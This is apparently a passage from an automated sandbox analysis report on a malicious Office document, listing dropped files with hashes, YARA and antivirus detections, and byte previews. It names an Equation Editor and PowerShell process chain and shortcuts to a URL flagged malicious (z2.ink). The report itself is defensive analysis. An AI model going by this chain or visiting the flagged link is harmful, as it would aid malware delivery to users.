                                  Preview:{\rt.........{\*\fontinfo250569160 \"}.{\398519213&]/3..`+56??^?2)4/_~6!,?_&1/&6]=..9:3]8*/|.<`&.:#(.41._+7%352|1)4?4^_@.<~..`*%@2/%?4+&6%9..??~2:?0?!*33.$0`!88]?30.!??<[?%$($<?3,?/.%!/425?0%)9-%@/11~??60%14*8.-9$?#?4.^0-6]72?9@317*$|[3-):3?`57..!.&<-..8/@15]_|-+.88?3$?;5?/-,0)`*,.+@1!!<&&3%((21~6%:7?-??(.#!.5_$./$&$).>~%(+;?(|./`'0)6~`'%3*`.,%#==.'[?.!?50:%$,|$.=&`??%..8)532%9^~^*?#?64:3|-.^%#71...7$?_??@)9?=181$.<*;$/7,?-%28]=.~0408!][/8?22)[?;)|-).1*_+4.@`(+?+#>=]:.%4+0!!$*6;?3)1+?&)2)2][.#:13?<1?0$?+79/%.8''~.1!>@-|^.&3':??~?0?).9*@1#.&(~68*(@05;;:4~?^@#)'5][)#,6./'@[|6.)!%,_>:@..~%,$`?%|(*.2@3:%414^%^./#>!.%`$&_:9!#+;?*',63'*?`&?-.:>_<?+='?*2=59:[%0...?*|[/.47?+,(%`).1.9.97'),_@?_%_$/?+>,]7]+=7/.?#:[*.07;1^2]2[.46#.%;8?0`?/??(,?]7]?|6<;%;<-~].&.$%0*')^+.;24[+.[;53/@8_?|?5_?4%_).92~@-3,'!.9).57?>-^@1+5<][6<.!&.22?*2_16/1|>^;%;%@8.#&:4??(25(?5)!'7%?75;=-//(3?&)6_1'[)3^;.~$>93!+.-!?'17?_/*?8..1???(%+??|><,81@61<~!?./']~^7485>$().-?<4^..)3:.2..)&48/)?>;.,!)7''?.']6.94;+!-??9$(.9?.|.11
                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):158312
                                  Entropy (8bit):3.2731864151473893
                                  Encrypted:false
                                  SSDEEP:1536:Igwd99COby6Cyc12taJK6d9gjh8W0/5JpXe1cNUg0B0bUZlu9gISsR5:XwdPUJK6L/Kcig0B0ci
                                  MD5:5CFD67486E857744CCC14E2DEF9FF318
                                  SHA1:4049E46FE68A2B97F3F6C7170A7FB859D097F88E
                                  SHA-256:D14DB1AEC62AA5C55D3E507CF9502A6D2E26C9F1C3FB55FE9649FF8576AF02B3
                                  SHA-512:6EC2A3C304A84468A2FF4CD26A4B74C05FA212794A5E7BDCFB538A35CBD560075541097450689833841CFC5D01020C1AB762F20D855E416033CCFFAF7E62E6EF
                                  Malicious:false
                                  Preview:......F.u.n.c.t.i.o.n. .W.M.I.D.a.t.e.S.t.r.i.n.g.T.o.D.a.t.e.(.d.t.m.E.v.e.n.t.D.a.t.e.).........W.M.I.D.a.t.e.S.t.r.i.n.g.T.o.D.a.t.e. .=. .C.D.a.t.e.(.M.i.d.(.d.t.m.E.v.e.n.t.D.a.t.e.,. .5.,. .2.). .&. ."./.". .&. ._.....M.i.d.(.d.t.m.E.v.e.n.t.D.a.t.e.,. .7.,. .2.). .&. ."./.". .&. .L.e.f.t.(.d.t.m.E.v.e.n.t.D.a.t.e.,. .4.). ._.....&. .". .". .&. .M.i.d. .(.d.t.m.E.v.e.n.t.D.a.t.e.,. .9.,. .2.). .&. .".:.". .&. ._.....M.i.d.(.d.t.m.E.v.e.n.t.D.a.t.e.,. .1.1.,. .2.). .&. .".:.". .&. .M.i.d.(.d.t.m.E.v.e.n.t.D.a.t.e.,. ._.....1.3.,. .2.).).........E.n.d. .F.u.n.c.t.i.o.n.....'././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.....'././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.....F.u.n.c.t.i.o.n. .g.e.t.D.e.s.c.r.i.p.t.i.o.n.(.s.t.
                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                  File Type:ISO-8859 text, with very long lines (1707), with CRLF, CR, LF line terminators
                                  Category:dropped
                                  Size (bytes):28906
                                  Entropy (8bit):3.097021912670486
                                  Encrypted:false
                                  SSDEEP:768:RqCYhRWIXXXd4r+ZCniBMjHtL6KPIfDarDY8:RGRWkd4YCiKjxjPIbar88
                                  MD5:F086617AD5F31052493192AF152C2FDF
                                  SHA1:2E1B7041E9F9A3BCC8300BCD15956C4CBE1B3A72
                                  SHA-256:E69569FFB1BDBF9185CB732BFA897EFDA4E62BA095D519EF3316BBDEBD6D9B9E
                                  SHA-512:F30E011A09DCBD744C67FC56676A5660A016DAFE1A1525FE91A12E11B360F741FB6EDE434EDDEC0487DAAA9A099ED9AC52095895C552C3E12AD74B535FBB9DEB
                                  Malicious:true
                                  Yara Hits:
                                  • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1B25204E.doc, Author: ditekSHen
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  Preview:{\rt.........{\*\fontinfo250569160 \"}.{\398519213&]/3..`+56??^?2)4/_~6!,?_&1/&6]=..9:3]8*/|.<`&.:#(.41._+7%352|1)4?4^_@.<~..`*%@2/%?4+&6%9..??~2:?0?!*33.$0`!88]?30.!??<[?%$($<?3,?/.%!/425?0%)9-%@/11~??60%14*8.-9$?#?4.^0-6]72?9@317*$|[3-):3?`57..!.&<-..8/@15]_|-+.88?3$?;5?/-,0)`*,.+@1!!<&&3%((21~6%:7?-??(.#!.5_$./$&$).>~%(+;?(|./`'0)6~`'%3*`.,%#==.'[?.!?50:%$,|$.=&`??%..8)532%9^~^*?#?64:3|-.^%#71...7$?_??@)9?=181$.<*;$/7,?-%28]=.~0408!][/8?22)[?;)|-).1*_+4.@`(+?+#>=]:.%4+0!!$*6;?3)1+?&)2)2][.#:13?<1?0$?+79/%.8''~.1!>@-|^.&3':??~?0?).9*@1#.&(~68*(@05;;:4~?^@#)'5][)#,6./'@[|6.)!%,_>:@..~%,$`?%|(*.2@3:%414^%^./#>!.%`$&_:9!#+;?*',63'*?`&?-.:>_<?+='?*2=59:[%0...?*|[/.47?+,(%`).1.9.97'),_@?_%_$/?+>,]7]+=7/.?#:[*.07;1^2]2[.46#.%;8?0`?/??(,?]7]?|6<;%;<-~].&.$%0*')^+.;24[+.[;53/@8_?|?5_?4%_).92~@-3,'!.9).57?>-^@1+5<][6<.!&.22?*2_16/1|>^;%;%@8.#&:4??(25(?5)!'7%?75;=-//(3?&)6_1'[)3^;.~$>93!+.-!?'17?_/*?8..1???(%+??|><,81@61<~!?./']~^7485>$().-?<4^..)3:.2..)&48/)?>;.,!)7''?.']6.94;+!-??9$(.9?.|.11
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                  Category:dropped
                                  Size (bytes):21672
                                  Entropy (8bit):3.11132160672872
                                  Encrypted:false
                                  SSDEEP:192:LaBrHLbyRlivQV8+9/wjUbLNU9PPPN26cHmyopJ0HTrtA6qLT8+j:uLbMlV8+9LU9PPPc6cHmqHXtA6qLjj
                                  MD5:6C130E74F6F9F8674A275A549DB8759C
                                  SHA1:7855A1008E5490F75855CCA71AC0B2A75D66AA64
                                  SHA-256:4E92135B3F7D4E62E40D869635DFB20BDE36AA35FDED539E7AA3A358E9E23B0B
                                  SHA-512:DF217162D1666E22372F1B43DF503EEA2B1D0BCC7EBA0020DDA60D205A99A9C4B5AF079A2A518B324A5D5C16F9EF8A33398A999B0772F8D7BA8AFF4E99925F1D
                                  Malicious:false
                                  Preview:....l...........7...............~@...&.. EMF.....T..+.......................j.......................{.......F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................<.......%...........%...........R...p................................@. C.a.l.i.b.r.i..........................................................................................2%.........d.........x.0.......0.....................x.0.....x.0.......0.....7......................@................C.a.l.i.b.r.i.......................................................................................dv......%...........%.......................R...p................................@."C.a.l.i.b.r.i........................................................................................./.S.............0.......0.......0.......................0.......0.......0.....7......................@.N..............C.a.l.i.b.r.i...........
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                  Category:dropped
                                  Size (bytes):628172
                                  Entropy (8bit):1.8784458080296922
                                  Encrypted:false
                                  SSDEEP:1536:X55BmEIRbhu5KBriOBDn/fKcfu50y7eMGn5v1IN6zJ8Tqbb0z88eqliq0:GnZu50yknG/qc+p
                                  MD5:33CD802D79D3EBA6B4492A32E2435249
                                  SHA1:ED27F46A081A8D0131B7AF82B0655981CE314BD4
                                  SHA-256:DCCD8DCB2FDD54E3C52CB13D76BB66D05056571992D1C8434FFDE460F7135732
                                  SHA-512:2B44D686E640CF71E23C2BB5274BF1E2A523FE23411D0DDA4B2A1198A4AA4BCC9E2DD65A73EF3F4178B1C0E2DBDDF4007ECC9DB87021DF3A29FC39A9666FDB8E
                                  Malicious:false
                                  Preview:....l................................5.. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...............N........... ...O...!..............?...........?................................'................ `.....%...........(.................... `.L...d...............N...........~...
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                  Category:dropped
                                  Size (bytes):628172
                                  Entropy (8bit):1.8784458080296922
                                  Encrypted:false
                                  SSDEEP:1536:X55BmEIRbhu5KBriOBDn/fKcfu50y7eMGn5v1IN6zJ8Tqbb0z88eqliq0:GnZu50yknG/qc+p
                                  MD5:33CD802D79D3EBA6B4492A32E2435249
                                  SHA1:ED27F46A081A8D0131B7AF82B0655981CE314BD4
                                  SHA-256:DCCD8DCB2FDD54E3C52CB13D76BB66D05056571992D1C8434FFDE460F7135732
                                  SHA-512:2B44D686E640CF71E23C2BB5274BF1E2A523FE23411D0DDA4B2A1198A4AA4BCC9E2DD65A73EF3F4178B1C0E2DBDDF4007ECC9DB87021DF3A29FC39A9666FDB8E
                                  Malicious:false
                                  Preview:....l................................5.. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...............N........... ...O...!..............?...........?................................'................ `.....%...........(.................... `.L...d...............N...........~...
                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                  File Type:Composite Document File V2 Document, Cannot read section info
                                  Category:dropped
                                  Size (bytes):16384
                                  Entropy (8bit):2.691504265284613
                                  Encrypted:false
                                  SSDEEP:96:mpMPQIX4/EG7v8RPLNkWRMPdIu42EG7v8RPLNkW:PPyEk0lN8P1Ek0lN
                                  MD5:6453E0BB417A0C8735812966FB60ED78
                                  SHA1:57DAE418543975AC0D6C43A28137529CF24162CA
                                  SHA-256:E01470CEA2998FFBE086A3F248D899D27042D7F2AA8510FB66BC74E0357FE51A
                                  SHA-512:B2B3D9766D9C188EC91B7127C3AA7E7EB628BAAE22BB1A64E5C034BA9E40552FCE771E04C92A6E3BBECEC1B851D9405C7A61C3A76B5841BE3B0554647F633CFE
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: Avira, Detection: 100%
                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):1024
                                  Entropy (8bit):0.05390218305374581
                                  Encrypted:false
                                  SSDEEP:3:ol3lYdn:4Wn
                                  MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                  SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                  SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                  SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                  Malicious:false
                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):4096
                                  Entropy (8bit):3.3531927086898494
                                  Encrypted:false
                                  SSDEEP:96:vHH8TdZ6Q2+xEt6NrUTvxuKatCqfaWb/ex4AIRMatTuA:vH6dZ6Qut+rUzk5UgVy4AIma9Z
                                  MD5:EACE236DCD0F66AA1498E6356C7AE8B2
                                  SHA1:696E88BF7DACF5444C0FD2127ECA9A1CAA65901B
                                  SHA-256:79A15B0CE54AD40B9F3A5C05225515972A6BCAD25B6F55E2AEEE9AD4CF37305E
                                  SHA-512:D953E57FD3852D78DD8FF53CA17AA911E331D661716E98F41D12FCBF520F875311D49B11AB17FB705258AC270B7DF5900FBC19E1298CC2572D64F4BA373CEE3B
                                  Malicious:false
                                  Preview:................9.8.5.1.9.2.1.3.&.]./.3.....`.+.5.6.?.?.^.?.2.).4./._.~.6.!.,.?._.&.1./.&.6.].=.....9.:.3.].8.*./.|...<.`.&...:.#.(...4.1..._.+.7.%.3.5.2.|.1.).4.?.4.^._.@...<.~.....`.*.%.@.2./.%.?.4.+.&.6.%.9.....?.?.~.2.:.?.0.?.!.*.3.3...$.0.`.!.8.8.].?.3.0...!.?.?.<.[.?.%.$.(.$.<.?.3.,.?./...%.!./.4.2.5.?.0.%.).9.-.%.@./.1.1.~.?.?.6.0.%.1.4.*.8...-.9.$.?.#.?.4...^.0.-.6.].7.2.?.9.@.3.1.7.*.$.|.[.3.-.).:.3.?.`.5.7.....!...&.<.-.....8./.@.1.5.]._.|.-.+...8.8.?.3.$.?.;.5.?./.-.,.0.).`.*.,...+.@.1.!.!.<.&.&.3.%.(.(.2.1.~.6.%.:.7.?.-.?.?.(...#.!...5._.$.../.$.&.$.)...>.~.%.(.+.;.?.(.|.../.`.'.0.).6.~.`.'.%.3.*.`...,.%.#.=.=...'.[.?...!.?.5.0.:.%.$.,.|.$...=.&.`.?.?.%.....8.).5.3.2.%.9.^.~.^.*.?.#.?.6.4.:.3.|.-...^.%.#.7.1.......7.$.?._.?.?.@.).9.?.=.1.8.1.$...<.*.;.$./.7.,.?.-.%.2.8.].=...~.0.4.0.8.!.].[./.8.?.2.2.).[.?.;.).|.-.)...1.*._.+.4...@.`.(.+.?.+.#.>.=.].:...%.4.+.0.!.!.$.*.6.;.?.3.).1.+.?.&.).2.).2.].[...#.:.1.3.?.<.1.?.0.$.?.+.7.9./.%...8.'.'.~...1.!.>.@.-.|.^...&.3.'.:.?.?.~.
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:very short file (no magic)
                                  Category:dropped
                                  Size (bytes):1
                                  Entropy (8bit):0.0
                                  Encrypted:false
                                  SSDEEP:3:U:U
                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                  Malicious:false
                                  Preview:1
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:very short file (no magic)
                                  Category:dropped
                                  Size (bytes):1
                                  Entropy (8bit):0.0
                                  Encrypted:false
                                  SSDEEP:3:U:U
                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                  Malicious:false
                                  Preview:1
                                  Process:C:\Windows\SysWOW64\explorer.exe
                                  File Type:SQLite 3.x database, last written using SQLite version 3008001, file counter 24, database pages 5, cookie 0xf, schema 4, UTF-8, version-valid-for 24
                                  Category:dropped
                                  Size (bytes):20480
                                  Entropy (8bit):1.3870145383915669
                                  Encrypted:false
                                  SSDEEP:48:TBLOpEO5J/Kd7UEvqckQaKgj5EZwx1wayEgd7kKK9LeYyBlIAO/tXK:hNw0CKaKfu1wai6LeYzN/9K
                                  MD5:1623709C6B2FB813984B1265C26A85F1
                                  SHA1:CCE4DDBE93E97E68359CB6FD71242F796A785F86
                                  SHA-256:88BCF762A75F085ECD3B12EB2BA81B81A7F8C9CDDDD4DED624BA28566EB7EEAA
                                  SHA-512:6D2E23E4E0D1D912AF3426129F7DE490F23326F6179EEC27AFE28C438CA37493AEA775E62755C76D6A8850DB6D6E70F0D0A8D396A35E869F4BF0F761CDD507D8
                                  Malicious:false
                                  Preview:SQLite format 3......@ .........................................................................-........#..k...#.<....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\SysWOW64\explorer.exe
                                  File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                  Category:dropped
                                  Size (bytes):77824
                                  Entropy (8bit):1.133993246026424
                                  Encrypted:false
                                  SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                  MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                  SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                  SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                  SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                  Malicious:false
                                  Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\SysWOW64\explorer.exe
                                  File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 3, database pages 20, cookie 0x15, schema 4, UTF-8, version-valid-for 3
                                  Category:dropped
                                  Size (bytes):40960
                                  Entropy (8bit):0.7798653713156546
                                  Encrypted:false
                                  SSDEEP:48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
                                  MD5:CD5ACB5FAA79EEB4CDB481C6939EEC15
                                  SHA1:527F3091889C553B87B6BC0180E903E2931CCCFE
                                  SHA-256:D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
                                  SHA-512:A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
                                  Malicious:false
                                  Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:very short file (no magic)
                                  Category:dropped
                                  Size (bytes):1
                                  Entropy (8bit):0.0
                                  Encrypted:false
                                  SSDEEP:3:U:U
                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                  Malicious:false
                                  Preview:1
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:very short file (no magic)
                                  Category:dropped
                                  Size (bytes):1
                                  Entropy (8bit):0.0
                                  Encrypted:false
                                  SSDEEP:3:U:U
                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                  Malicious:false
                                  Preview:1
                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):131072
                                  Entropy (8bit):0.025246492481374738
                                  Encrypted:false
                                  SSDEEP:6:I3DPcfy/7u1HvxggLR5kS1AZoFRXv//4tfnRujlw//+GtluJ/eRuj:I3DPjuRf/vYg3J/
                                  MD5:C15C83C5778720A2D10B25F1C6201622
                                  SHA1:01DEED5673CFF4E446E8D88EEB46AFE8620688C2
                                  SHA-256:4C66CD17E00341199BCF6E5164D37069C18ED3FAE49EB46AB1C12B61B9C3D526
                                  SHA-512:35CE37315234C755CDD9891D463C95DDCF825E351BAFEF0F0F7B67C918A54C14B474D303BFA58C50DF6ED69608448D0E517AD4980752577E20A264DF9EC20333
                                  Malicious:false
                                  Preview:......M.eFy...z.^.9..EE....._,S,...X.F...Fa.q............................G.]z).YK.6O...............8.i+]C....#9.y.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):131072
                                  Entropy (8bit):0.025481530230235333
                                  Encrypted:false
                                  SSDEEP:6:I3DPcJUYE1xNHvxggLR8jqtqZz3RXv//4tfnRujlw//+GtluJ/eRuj:I3DPYUY+Z8qsZ1vYg3J/
                                  MD5:912E2E67E9404F25DC1024C18FFBDEC8
                                  SHA1:013A9A7BAD22A08482C41226DD34DCA46B258E39
                                  SHA-256:EEEC61CEA49D1E982C9117C5F1D8D59F978B9DDEB6E0EBC6292393FEE759E898
                                  SHA-512:7056966A65551026A7005E0E7B8A6EA625A3CA179AB9DFDE0867F689C655EC6BFBBF082957CB2B959F269B59F8877290A1E7DFD760B9DD7E87818A68AB1C07D2
                                  Malicious:false
                                  Preview:......M.eFy...zNq..<.@F... ).`.S,...X.F...Fa.q.............................s. a.-I.AJ%M...........E...3l.M..dX..Y.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):512
                                  Entropy (8bit):0.0
                                  Encrypted:false
                                  SSDEEP:3::
                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                  Malicious:false
                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):16384
                                  Entropy (8bit):0.7558479785468107
                                  Encrypted:false
                                  SSDEEP:48:7Xp6n4CH+wzlJVixkweC9Cd1kmpUFUoibk8:7Xp64CH+wPae5MUX
                                  MD5:366AEF6F8B626168888E766D0247D7F6
                                  SHA1:937B7B5B031DE07FD3A58655CD6D296EB3834586
                                  SHA-256:2A9C79805C0B62A9082B522295285FCEBD6FB8EB779E3ACFFC7251BB29351334
                                  SHA-512:907FC5517CD44B9C2015095992A149B57E73D5041F502940BF9FA8B0455CD3C814F5CE5AB115D204885EA8A5156A469543EEA95B240571E7809FE5D5BA8DE175
                                  Malicious:false
                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):512
                                  Entropy (8bit):0.0
                                  Encrypted:false
                                  SSDEEP:3::
                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                  Malicious:false
                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                  File Type:Generic INItialization configuration [xls]
                                  Category:modified
                                  Size (bytes):60
                                  Entropy (8bit):4.450489295854282
                                  Encrypted:false
                                  SSDEEP:3:bDDW94LZX/UYCmMTBCv:b/3ZX+T2
                                  MD5:E3B1660C44C00D2A5E0486F2810413C4
                                  SHA1:7F949B38D62E2FAFF1B4805D4B26C39B99C002F7
                                  SHA-256:A54193170A53453913B48619DC8EBB9A416666C73A54547697EF4372B50773C5
                                  SHA-512:97861D50200935609E62A91502DF367D4C4DDABE557B31FDADE8E2D433F503E621F882E378A23896021EBFE2AF9478A0C374DEB14470DE2C70EF7DFC2E742351
                                  Malicious:false
                                  Preview:[folders]..nXPJ.url=0..z2.ink.url=0...LNK=0..[xls]...LNK=0..
                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                  File Type:MS Windows 95 Internet shortcut text (URL=<http://z2.ink/nXPJ>), ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):44
                                  Entropy (8bit):4.589780198035243
                                  Encrypted:false
                                  SSDEEP:3:HRAbABGQYm/5XGY:HRYFVm/5XZ
                                  MD5:2FD56CC67805992F9FD505683625003E
                                  SHA1:0476249A068212B59827BDE7EBB955EEA6C6880C
                                  SHA-256:2EA6B0B4D8D0CF806F32E889E4FEA747E017917FE8AF1368F93EA730422D0094
                                  SHA-512:4B9875380A5F2EEAC0AC3D3FE9C5BA97CF1ACB4E7E8E61F3531DF57E02B57AC122098C3255D8B56C33C7E93F5637284BECB25ABA35386D85F0252235AF006B80
                                  Malicious:true
                                  Preview:[InternetShortcut]..URL=http://z2.ink/nXPJ..
                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                  File Type:MS Windows 95 Internet shortcut text (URL=<http://z2.ink/>), ASCII text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):40
                                  Entropy (8bit):4.446439344671015
                                  Encrypted:false
                                  SSDEEP:3:HRAbABGQYm/5XG8n:HRYFVm/5XJn
                                  MD5:7F1FACEA6A36B544AC585A5173C32BBC
                                  SHA1:2B9A9BA3C87CEF7C19ED56EEBA30731D250D4726
                                  SHA-256:2A4741F9C5EDC7138E16555F591135B3258319D3DFF94D7864AF06AB73E66262
                                  SHA-512:16E1F8B87EF5D39867FF4B82D4F472EA059680C3344FFEF3F033F6410F9FA0D6626FB16E43DC041AB56606EBEFFC444D3CCC088581C18038DC32A9BC7318E41A
                                  Malicious:true
                                  Preview:[InternetShortcut]..URL=http://z2.ink/..
                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):162
                                  Entropy (8bit):2.503835550707525
                                  Encrypted:false
                                  SSDEEP:3:vrJlaCkWtVywgmbVWtUykLC+ln:vdsCkWt3gmoUyd+l
                                  MD5:B37CE9E8345F9558D8E3AFB62D07B0DF
                                  SHA1:99057A85C270AC5FACCB9F49E1FEA3E73B1BC5BD
                                  SHA-256:B0542FB818F2CBEA824C83BE01289ED036D9BDF164970A75B018F43E26547FA4
                                  SHA-512:88C7BEFCBB413DA42095ADFFF91AA82350181FF6162718D0A98B4A2E6D472499B3647C3E33A119326A134AA96D9D97984E73695F1D4C59F29F06484E2CAC325F
                                  Malicious:false
                                  Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):158312
                                  Entropy (8bit):3.2731864151473893
                                  Encrypted:false
